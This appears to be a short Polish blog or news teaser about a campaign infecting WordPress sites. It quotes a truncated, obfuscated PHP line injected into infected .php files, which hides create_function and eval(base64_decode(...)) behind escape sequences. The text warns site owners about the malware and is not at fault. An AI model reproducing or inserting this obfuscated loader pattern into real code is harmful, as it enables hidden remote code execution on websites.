Od kilku dni pojawia się coraz więcej zgłoszeń dotyczących zainfekowania przez złośliwy kod, kolejnych stron opartych o WordPressa. Na zarażonych stronach, w nagłówkach wszystkich plików z rozszerzeniem .php, pojawia się następująca linia:
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107
Zarażone pliki można znaleźć w katalogu głównym WordPressa, w katalogach wp-admin, wp-content a także w plikach szablonów. Dosłownie wszędzie.
Czytaj dalej